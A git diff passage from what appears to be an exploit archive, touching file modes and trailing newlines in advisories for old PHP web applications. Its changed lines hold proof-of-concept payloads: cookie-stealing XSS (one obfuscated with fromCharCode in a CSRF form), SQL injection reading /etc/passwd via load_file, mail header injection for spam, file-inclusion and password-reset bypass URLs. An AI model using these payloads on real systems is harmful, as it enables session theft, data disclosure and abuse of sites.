type="submit"> </form> </body> </html> \ No newline at end of file +<html> <body> <form action="http://www.example.com/wp-admin/plugins.php?page=akismet-key-config" method="post" id="akismet-conf"> <input name="_wpnonce" value="'" type="text"> <input name="_wp_http_referer" value="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105 ,101,41))</script>" type="text"> <input id="key" name="key" size="15" maxlength="12" value="1337"> <input name="submit" value="Update options »" type="submit"> </form> </body> </html> \ No newline at end of file diff --git a/platforms/php/webapps/3004.txt b/platforms/php/webapps/3004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30040.txt b/platforms/php/webapps/30040.txt old mode 100755 new mode 100644 index 6f19905ce..795411258 --- a/platforms/php/webapps/30040.txt +++ b/platforms/php/webapps/30040.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to send spam email in the context of the applic Jetbox 2.1 is vulnerable; other versions may also be affected. -http://www.example.com/[JETBOX-DIRECTORY formmail.php?recipient=spam1@somedomain.com&_SETTINGS[allowed_email_hosts][]=somedomain.com&subject=Some Spam Subject%0ABcc: spam_address2@somedomain.com, spam_address2@somedomain.com, spam_address4@somedomain.com, spam_addressN@somedomain.com%0AFrom: any_address@somedomain.com%0AMIME-Version: 1.0%0AContent-Type: multipart/mixed; boundary=Hacker;%0A%0A-- Hacker%0ASome Spam Message%0A%0AContent-Type:text/html;name=any_file.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition: attachment%0A%0AHTML File%0A%0A--Hacker--%0AOther text will be hide \ No newline at end of file +http://www.example.com/[JETBOX-DIRECTORY formmail.php?recipient=spam1@somedomain.com&_SETTINGS[allowed_email_hosts][]=somedomain.com&subject=Some Spam Subject%0ABcc: spam_address2@somedomain.com, spam_address2@somedomain.com, spam_address4@somedomain.com, spam_addressN@somedomain.com%0AFrom: any_address@somedomain.com%0AMIME-Version: 1.0%0AContent-Type: multipart/mixed; boundary=Hacker;%0A%0A-- Hacker%0ASome Spam Message%0A%0AContent-Type:text/html;name=any_file.html;%0AContent-Transfer-Encoding:8bit%0AContent-Disposition: attachment%0A%0AHTML File%0A%0A--Hacker--%0AOther text will be hide \ No newline at end of file diff --git a/platforms/php/webapps/30041.txt b/platforms/php/webapps/30041.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30042.txt b/platforms/php/webapps/30042.txt old mode 100755 new mode 100644 index 9521aefa1..53c5f31e8 --- a/platforms/php/webapps/30042.txt +++ b/platforms/php/webapps/30042.txt @@ -11,4 +11,4 @@ http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=[ http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=[xss] http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=[xss] http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=[xss] http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=1&recipient=jetbox@www.example2.com&require[xss] http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=&recipient=jetbox@www.example2.com&required=firstname,surname,email,companyname,country,workphone,title,topic,website,text&signupsubmit=true&subject=News&submit=Send&surname=[xss] -http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=1&recipient=jetbox@www.example2.com&required=firstname,surname,email,companyname,country,workphone,title,topic,website,text&signupsubmit=true&subject=News&submit=Send&surname=1&text=1&title=[xss] \ No newline at end of file +http://www.example.com/jetbox/index.php/view/supplynews/?companyname=1&country=1&email=1&firstname=1&middlename=1&recipient=jetbox@www.example2.com&required=firstname,surname,email,companyname,country,workphone,title,topic,website,text&signupsubmit=true&subject=News&submit=Send&surname=1&text=1&title=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/30047.txt b/platforms/php/webapps/30047.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30050.html b/platforms/php/webapps/30050.html old mode 100755 new mode 100644 index 3c3eb78c0..4331cef74 --- a/platforms/php/webapps/30050.html +++ b/platforms/php/webapps/30050.html @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Redoable 1.2 is vulnerable; other versions may also be affected. -<!-- Redoable 1.2 - Cross-Site Scripting Vulnerability --------------- Vulnerable Code --------------- header.php (line 6): ... elseif (is_search()) { ?> Search for <?php echo $s } ... searchloop.php (line 24): elseif (is_search()) { printf(__('Search Results for \'%s\'','redo_domain'), $s); } ------------ Patched Code ------------ header.php (line 6 FIXED): ... elseif (is_search()) { ?> Search for <?php echo strip_tags($s); } ... searchloop.php (line 24 FIXED): elseif (is_search()) { printf(__('Search Results for \'%s\'','redo_domain'), strip_tags($s)); } Vulnerable Variable: s Vulnerable File: wp-content/themes/redoable/searchloop.php and header.php Vulnerable: Redoable 1.2 (other versions should also be vulnerable) Google d0rk: "and Redoable 1.2" John Martinelli john@martinelli.com RedLevel Security http://www.RedLevel.org May 17th, 2007 !--> <html> <head><title>Redoable 1.2 - Cross-Site Scripting Vulnerability</title><body> <center><br><br> <font size=4>Redoable 1.2 - Cross-Site Scripting Vulnerability</font><br> <font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br> Google d0rk: <a href="http://www.google.com/search?q=%22and+Redoable+1.2%22">"and Redoable 1.2"</a> </font><br><br><br> <center>file <b>index.php</b> - variable <b>s</b> - method <b>get</b></center><br> <form action="http://www.example.com/index.php" method="get"> <input size=75 name="s" value="</title><script>alert(1)</script>"> <input type=submit value="Execute XSS Attack" class="button"> </form> <br><br><br> </form> </body></html> \ No newline at end of file +<!-- Redoable 1.2 - Cross-Site Scripting Vulnerability --------------- Vulnerable Code --------------- header.php (line 6): ... elseif (is_search()) { ?> Search for <?php echo $s } ... searchloop.php (line 24): elseif (is_search()) { printf(__('Search Results for \'%s\'','redo_domain'), $s); } ------------ Patched Code ------------ header.php (line 6 FIXED): ... elseif (is_search()) { ?> Search for <?php echo strip_tags($s); } ... searchloop.php (line 24 FIXED): elseif (is_search()) { printf(__('Search Results for \'%s\'','redo_domain'), strip_tags($s)); } Vulnerable Variable: s Vulnerable File: wp-content/themes/redoable/searchloop.php and header.php Vulnerable: Redoable 1.2 (other versions should also be vulnerable) Google d0rk: "and Redoable 1.2" John Martinelli john@martinelli.com RedLevel Security http://www.RedLevel.org May 17th, 2007 !--> <html> <head><title>Redoable 1.2 - Cross-Site Scripting Vulnerability</title><body> <center><br><br> <font size=4>Redoable 1.2 - Cross-Site Scripting Vulnerability</font><br> <font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br> Google d0rk: <a href="http://www.google.com/search?q=%22and+Redoable+1.2%22">"and Redoable 1.2"</a> </font><br><br><br> <center>file <b>index.php</b> - variable <b>s</b> - method <b>get</b></center><br> <form action="http://www.example.com/index.php" method="get"> <input size=75 name="s" value="</title><script>alert(1)</script>"> <input type=submit value="Execute XSS Attack" class="button"> </form> <br><br><br> </form> </body></html> \ No newline at end of file diff --git a/platforms/php/webapps/30051.txt b/platforms/php/webapps/30051.txt old mode 100755 new mode 100644 index 8f7426fe5..97beb424b --- a/platforms/php/webapps/30051.txt +++ b/platforms/php/webapps/30051.txt @@ -6,4 +6,4 @@ Exploiting this issue can allow an attacker to access sensitive data that may be PsychoStats 3.0.6b and prior versions are vulnerable to this issue. -http://www.example.com/[path]/server.php?newcss=styles.css&newtheme=%00 \ No newline at end of file +http://www.example.com/[path]/server.php?newcss=styles.css&newtheme=%00 \ No newline at end of file diff --git a/platforms/php/webapps/30053.txt b/platforms/php/webapps/30053.txt old mode 100755 new mode 100644 index b72c1f018..f2a63a14b --- a/platforms/php/webapps/30053.txt +++ b/platforms/php/webapps/30053.txt @@ -8,4 +8,4 @@ ClientExec 3.0.0 beta2 is vulnerable; other versions may also be affected. http://www.example.com/[path]/index.php?ticketID=[xss] http://www.example.com/[path]/index.php?view=[xss] -http://www.example.com/[path]/index.php?fuse=[xss] \ No newline at end of file +http://www.example.com/[path]/index.php?fuse=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/3006.txt b/platforms/php/webapps/3006.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30063.txt b/platforms/php/webapps/30063.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30064.txt b/platforms/php/webapps/30064.txt old mode 100755 new mode 100644 index 38a52c3e4..2b4430ae1 --- a/platforms/php/webapps/30064.txt +++ b/platforms/php/webapps/30064.txt @@ -6,4 +6,4 @@ Exploiting these issues may help an attacker steal cookie-based authentication c HLstats 1.35 is vulnerable; other versions may also be affected. -http://www.example.com/hlstats/hlstats.php/>"><script>alert(1)</script> http://www.example.com/hlstats/hlstats.php?action=[xss] \ No newline at end of file +http://www.example.com/hlstats/hlstats.php/>"><script>alert(1)</script> http://www.example.com/hlstats/hlstats.php?action=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/30065.html b/platforms/php/webapps/30065.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30066.txt b/platforms/php/webapps/30066.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30068.txt b/platforms/php/webapps/30068.txt old mode 100755 new mode 100644 index cacc7c21f..3d7fdb2c8 --- a/platforms/php/webapps/30068.txt +++ b/platforms/php/webapps/30068.txt @@ -6,4 +6,4 @@ This vulnerability may allow an attacker to perform cross-site scripting attacks Jetbox 2.1 is reported vulnerable; other versions may also be affected. -http://www.example.com/product/index.php?view=webuser&task=sendpw&login=<script>alert(document.cookies)</script> \ No newline at end of file +http://www.example.com/product/index.php?view=webuser&task=sendpw&login=<script>alert(document.cookies)</script> \ No newline at end of file diff --git a/platforms/php/webapps/3007.txt b/platforms/php/webapps/3007.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30070.html b/platforms/php/webapps/30070.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30071.txt b/platforms/php/webapps/30071.txt old mode 100755 new mode 100644 index 594013771..30e93805d --- a/platforms/php/webapps/30071.txt +++ b/platforms/php/webapps/30071.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th ABC Excel Parser Pro 4.0 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/sample/xls2mysql/parser_path=shell.txt? \ No newline at end of file +http://www.example.com/[path]/sample/xls2mysql/parser_path=shell.txt? \ No newline at end of file diff --git a/platforms/php/webapps/30073.txt b/platforms/php/webapps/30073.txt old mode 100755 new mode 100644 index 889d5518a..bd3836a6f --- a/platforms/php/webapps/30073.txt +++ b/platforms/php/webapps/30073.txt @@ -6,4 +6,4 @@ This vulnerability potentially allows an attacker to perform cross-site scriptin GMTT Music Distro 1.2 is reported vulnerable; other versions may also be affected. -http://www.example.com/path/showown.php?st=XSS \ No newline at end of file +http://www.example.com/path/showown.php?st=XSS \ No newline at end of file diff --git a/platforms/php/webapps/30075.txt b/platforms/php/webapps/30075.txt old mode 100755 new mode 100644 index f2b62275c..4f66758bf --- a/platforms/php/webapps/30075.txt +++ b/platforms/php/webapps/30075.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability may allow an attacker to perform cross-site script phpPgAdmin 4.1.1 is reported vulnerable; other versions may also be affected. -https://www.example.com/phpPgAdmin/sqledit.php?server=[xss] \ No newline at end of file +https://www.example.com/phpPgAdmin/sqledit.php?server=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/30076.txt b/platforms/php/webapps/30076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30079.txt b/platforms/php/webapps/30079.txt old mode 100755 new mode 100644 index 4c3f1f0e4..b57fcf416 --- a/platforms/php/webapps/30079.txt +++ b/platforms/php/webapps/30079.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability could allow an attacker to perform cross-site scri 2z Project 0.9.5 is reported vulnerable; other versions may also be affected. -http://www.example.com/2zcms/?category=none&altname=testnews&rating=xxx \ No newline at end of file +http://www.example.com/2zcms/?category=none&altname=testnews&rating=xxx \ No newline at end of file diff --git a/platforms/php/webapps/30081.txt b/platforms/php/webapps/30081.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30082.txt b/platforms/php/webapps/30082.txt old mode 100755 new mode 100644 index 6f916152b..d969aa69f --- a/platforms/php/webapps/30082.txt +++ b/platforms/php/webapps/30082.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability may allow an attacker to perform cross-site script Gnuturk 3G is vulnerable to this issue. -http://www.target.com/mods.php?go=News&p=ln&year=2007&month="><h1>Vagrant</h1><script>alert(document.cookie)</script> \ No newline at end of file +http://www.target.com/mods.php?go=News&p=ln&year=2007&month="><h1>Vagrant</h1><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/30083.txt b/platforms/php/webapps/30083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30084.php b/platforms/php/webapps/30084.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30086.txt b/platforms/php/webapps/30086.txt old mode 100755 new mode 100644 index 229c47029..0faf2d5f9 --- a/platforms/php/webapps/30086.txt +++ b/platforms/php/webapps/30086.txt @@ -4,4 +4,4 @@ BoastMachine is prone to a cross-site scripting vulnerability. Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. -http://www.target.com/index.php?action=search&item=content&blog=[xss] \ No newline at end of file +http://www.target.com/index.php?action=search&item=content&blog=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/30087.txt b/platforms/php/webapps/30087.txt old mode 100755 new mode 100644 index 319beb656..7d858d895 --- a/platforms/php/webapps/30087.txt +++ b/platforms/php/webapps/30087.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica Digirez 3.4 is vulnerable to these issues. -http://www.example.com/room/info_book.asp?Room_name='><script>alert(1);</script> http://www.example.com/room/week.asp?curYear='><script>alert(1);</script> \ No newline at end of file +http://www.example.com/room/info_book.asp?Room_name='><script>alert(1);</script> http://www.example.com/room/week.asp?curYear='><script>alert(1);</script> \ No newline at end of file diff --git a/platforms/php/webapps/30088.txt b/platforms/php/webapps/30088.txt old mode 100755 new mode 100644 index edbd66021..ef6ea7b8f --- a/platforms/php/webapps/30088.txt +++ b/platforms/php/webapps/30088.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to reset account passwords for arbitrary user Pligg 9.5 is reported vulnerable; other versions may also be affected. -http://www.example.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7 \ No newline at end of file +http://www.example.com/login.php?processlogin=4&username=admin&confirmationcode=1234567891e2f566cbda0a9c855240bf21b8bae030404cad7 \ No newline at end of file diff --git a/platforms/php/webapps/3009.txt b/platforms/php/webapps/3009.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30090.txt b/platforms/php/webapps/30090.txt old mode 100755 new mode 100644 index 2f8d7328e..53692d5ad --- a/platforms/php/webapps/30090.txt +++ b/platforms/php/webapps/30090.txt @@ -4,4 +4,4 @@ phpPgAdmin is prone to a cross-site scripting vulnerability. Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/redirect.php/%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E?subject=server&server=test \ No newline at end of file +http://www.example.com/redirect.php/%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E?subject=server&server=test \ No newline at end of file diff --git a/platforms/php/webapps/30092.txt b/platforms/php/webapps/30092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30094.txt b/platforms/php/webapps/30094.txt old mode 100755 new mode 100644 index 0e0f16200..ea1b3eec5 --- a/platforms/php/webapps/30094.txt +++ b/platforms/php/webapps/30094.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability may allow an attacker to perform cross-site script This issue affects DGNews 2.1; other versions may also be affected. -http://www.example.com/footer.php?copyright=[xss] \ No newline at end of file +http://www.example.com/footer.php?copyright=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/30095.txt b/platforms/php/webapps/30095.txt old mode 100755 new mode 100644 index 6053ba3ab..49f56a9c8 --- a/platforms/php/webapps/30095.txt +++ b/platforms/php/webapps/30095.txt @@ -6,4 +6,4 @@ Successful exploits could allow an attacker to compromise the application, acces DGNews 2.1 is reported vulnerable; other versions may also be affected. -http://www.example.com/news.php?go=newslist&catid=' UNION SELECT 1,`site_title` FROM `news_config` WHERE '1 \ No newline at end of file +http://www.example.com/news.php?go=newslist&catid=' UNION SELECT 1,`site_title` FROM `news_config` WHERE '1 \ No newline at end of file diff --git a/platforms/php/webapps/30097.txt b/platforms/php/webapps/30097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30098.txt b/platforms/php/webapps/30098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30099.txt b/platforms/php/webapps/30099.txt old mode 100755 new mode 100644 index 254031760..1c4839e83 --- a/platforms/php/webapps/30099.txt +++ b/platforms/php/webapps/30099.txt @@ -9,4 +9,4 @@ DGNews 2.1 is reported vulnerable; other versions may also be affected. http://www.example.com/news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7%20from%2 0news_comment http://www.example.com/news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E657 -7732F61646D696E2F636F6E6E2E706870),4,5,6,7%20from%20news_comment \ No newline at end of file +7732F61646D696E2F636F6E6E2E706870),4,5,6,7%20from%20news_comment \ No newline at end of file diff --git a/platforms/php/webapps/3010.txt b/platforms/php/webapps/3010.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30101.txt b/platforms/php/webapps/30101.txt old mode 100755 new mode 100644 index ffd89f7fc..9ec88f5c8 --- a/platforms/php/webapps/30101.txt +++ b/platforms/php/webapps/30101.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc cpCommerce 1.1.0 is reported vulnerable; other versions may also be affected. -http://www.example.com/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,LOAD_FILE(0x2F6574632F706173737764),0/**/from/**/cpAccounts/* \ No newline at end of file +http://www.example.com/cpcommerce/manufacturer.php?id_manufacturer=-9/**/union/**/select/**/pass,LOAD_FILE(0x2F6574632F706173737764),0/**/from/**/cpAccounts/* \ No newline at end of file diff --git a/platforms/php/webapps/30102.php b/platforms/php/webapps/30102.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30103.txt b/platforms/php/webapps/30103.txt old mode 100755 new mode 100644 index bef2cf338..33df8e33d --- a/platforms/php/webapps/30103.txt +++ b/platforms/php/webapps/30103.txt @@ -4,4 +4,4 @@ Particle Blogger is prone to an SQL-injection vulnerability because it fails to Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/apppath/archives.php?year=2007&month=' \ No newline at end of file +http://www.example.com/apppath/archives.php?year=2007&month=' \ No newline at end of file diff --git a/platforms/php/webapps/30105.txt b/platforms/php/webapps/30105.txt old mode 100755 new mode 100644 index 3ab61ca6c..8d75757c7 --- a/platforms/php/webapps/30105.txt +++ b/platforms/php/webapps/30105.txt @@ -31,6 +31,4 @@ scripting. The payload used is <input onmouseover=prompt(document.cookie)> More information, including screenshots, can be found at: -http://www.nerdbox.it/wordpress-download-manager-xss/ - - \ No newline at end of file +http://www.nerdbox.it/wordpress-download-manager-xss/ \ No newline at end of file diff --git a/platforms/php/webapps/30107.txt b/platforms/php/webapps/30107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30109.txt b/platforms/php/webapps/30109.txt old mode 100755 new mode 100644 index 4165fa5dd..0969c9ed6 --- a/platforms/php/webapps/30109.txt +++ b/platforms/php/webapps/30109.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects Particle Gallery 1.0.1 and prior versions. -http://www.example.com/apppath/search.php?user=admin&order=>"><ScRiPt%20%0a%0d>alert(1111110)%3B</ScRiPt> \ No newline at end of file +http://www.example.com/apppath/search.php?user=admin&order=>"><ScRiPt%20%0a%0d>alert(1111110)%3B</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/30111.txt b/platforms/php/webapps/30111.txt old mode 100755 new mode 100644 index fc563d80a..f79cdb459 --- a/platforms/php/webapps/30111.txt +++ b/platforms/php/webapps/30111.txt @@ -7,4 +7,4 @@ An attacker can exploit this issue by manipulating the SQL query logic to carry This issue affects myBloggie 2.1.6 and earlier. http://www.example.com/apppath/index.php?mode=viewuser&cat_id=' -http://www.example.com/apppath/index.php?mode=viewuser&month_no=4&year=" \ No newline at end of file +http://www.example.com/apppath/index.php?mode=viewuser&month_no=4&year=" \ No newline at end of file diff --git a/platforms/php/webapps/30112.txt b/platforms/php/webapps/30112.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30113.txt b/platforms/php/webapps/30113.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30114.txt b/platforms/php/webapps/30114.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30115.txt b/platforms/php/webapps/30115.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30116.txt b/platforms/php/webapps/30116.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30118.txt b/platforms/php/webapps/30118.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30119.txt b/platforms/php/webapps/30119.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3012.txt b/platforms/php/webapps/3012.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30120.txt b/platforms/php/webapps/30120.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30121.txt b/platforms/php/webapps/30121.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30122.txt b/platforms/php/webapps/30122.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30123.txt b/platforms/php/webapps/30123.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30124.txt b/platforms/php/webapps/30124.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30125.txt b/platforms/php/webapps/30125.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30126.txt b/platforms/php/webapps/30126.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30127.txt b/platforms/php/webapps/30127.txt old mode 100755 new mode 100644 index accfaae37..3510744c9 --- a/platforms/php/webapps/30127.txt +++ b/platforms/php/webapps/30127.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute an arbitrary remote file contai This issue affects 'Prototype of an PHP application' 0.1. -http://example.com/script/plugins/phpgacl/admin/index.php?path_inc=[shell] \ No newline at end of file +http://example.com/script/plugins/phpgacl/admin/index.php?path_inc=[shell] \ No newline at end of file diff --git a/platforms/php/webapps/30128.txt b/platforms/php/webapps/30128.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30129.txt b/platforms/php/webapps/30129.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30131.txt b/platforms/php/webapps/30131.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30132.txt b/platforms/php/webapps/30132.txt old mode 100755 new mode 100644 index 5fec723db..6bd6111f3 --- a/platforms/php/webapps/30132.txt +++ b/platforms/php/webapps/30132.txt @@ -4,4 +4,4 @@ Evenzia CMS is prone to a cross-site script vulnerability because the applicatio An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/includes/send.inc.php/>'>><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/includes/send.inc.php/>'>><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/30133.txt b/platforms/php/webapps/30133.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30134.txt b/platforms/php/webapps/30134.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30135.txt b/platforms/php/webapps/30135.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30136.txt b/platforms/php/webapps/30136.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30137.txt b/platforms/php/webapps/30137.txt old mode 100755 new mode 100644 index ed45d9d5b..5b27ee733 --- a/platforms/php/webapps/30137.txt +++ b/platforms/php/webapps/30137.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br PHP Live! 3.2.2 is vulnerable to this issue; other versions may also be affected. http://www.example.com/phplive/setup/footer.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script> -http://www.example.com/phplive/setup/footer.php?PHPLIVE_VERSION=<script>alert(123);</script> http://www.example.com/phplive/setup/footer.php?nav_line=<script>alert(123);</script> \ No newline at end of file +http://www.example.com/phplive/setup/footer.php?PHPLIVE_VERSION=<script>alert(123);</script> http://www.example.com/phplive/setup/footer.php?nav_line=<script>alert(123);</script> \ No newline at end of file diff --git a/platforms/php/webapps/30138.txt b/platforms/php/webapps/30138.txt old mode 100755 new mode 100644 index 8e48a4580..79d1a616e --- a/platforms/php/webapps/30138.txt +++ b/platforms/php/webapps/30138.txt @@ -4,4 +4,4 @@ Codelib Linker is prone to a cross-site scripting vulnerability because the appl An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/index.php?cat=[xss] \ No newline at end of file +http://www.example.com/index.php?cat=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/3014.txt b/platforms/php/webapps/3014.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30140.txt b/platforms/php/webapps/30140.txt old mode 100755 new mode 100644 index 15ede81ee..c0f5db219 --- a/platforms/php/webapps/30140.txt +++ b/platforms/php/webapps/30140.txt @@ -4,4 +4,4 @@ Okyanusmedya is prone to a cross-site scripting vulnerability because the applic An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/index.php?pages=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(document.cookie)%3B%3C/ScRiPt%3E http://www.example.com/index.php?pages=menu=3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(document.cookie)%3B%3C/script%3E \ No newline at end of file +http://www.example.com/index.php?pages=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(document.cookie)%3B%3C/ScRiPt%3E http://www.example.com/index.php?pages=menu=3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(document.cookie)%3B%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/30143.txt b/platforms/php/webapps/30143.txt old mode 100755 new mode 100644 index a2425b0ae..6d5266963 --- a/platforms/php/webapps/30143.txt +++ b/platforms/php/webapps/30143.txt @@ -15,4 +15,4 @@ http://www.example.com/index.php?pageid=[XSS] http://www.example.com/index.php?pageid=[XSS] http://www.example.com/index.php?pageid=-->[XSS] http://www.example.com/index.php?pageid=email@address.com[XSS]domain.com -http://www.example.com/index.php?pageid=[XSS] \ No newline at end of file +http://www.example.com/index.php?pageid=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30152.txt b/platforms/php/webapps/30152.txt old mode 100755 new mode 100644 index d9548109b..9ef06dd17 --- a/platforms/php/webapps/30152.txt +++ b/platforms/php/webapps/30152.txt @@ -4,4 +4,4 @@ My DataBook is prone to multiple input-validation vulnerabilities, including cro Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/apppath/diary.php?month=06&year=2007&day=01&delete=%27 http://www.example.com/apppath/diary.php?month=06&year=2007&day=01&delete=%00' \ No newline at end of file +http://www.example.com/apppath/diary.php?month=06&year=2007&day=01&delete=%27 http://www.example.com/apppath/diary.php?month=06&year=2007&day=01&delete=%00' \ No newline at end of file diff --git a/platforms/php/webapps/30153.txt b/platforms/php/webapps/30153.txt old mode 100755 new mode 100644 index 29c0bb591..3696a8aa4 --- a/platforms/php/webapps/30153.txt +++ b/platforms/php/webapps/30153.txt @@ -4,4 +4,4 @@ My DataBook is prone to multiple input-validation vulnerabilities, including cro Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/apppath/diary.php?Sec=diary&month=06&year=</title><ScRiPt%20%0a%0d>alert(123123123)%3B</ScRiPt>&day=01 \ No newline at end of file +http://www.example.com/apppath/diary.php?Sec=diary&month=06&year=</title><ScRiPt%20%0a%0d>alert(123123123)%3B</ScRiPt>&day=01 \ No newline at end of file diff --git a/platforms/php/webapps/30157.txt b/platforms/php/webapps/30157.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30158.txt b/platforms/php/webapps/30158.txt old mode 100755 new mode 100644 index 85ab1360e..b24778463 --- a/platforms/php/webapps/30158.txt +++ b/platforms/php/webapps/30158.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to include arbitrary remote files containin JD-Wiki 1.0.2 and earlier versions are vulnerable to this issue; other versions may also be affected. -http://www.example.com/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path= \ No newline at end of file +http://www.example.com/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path= \ No newline at end of file diff --git 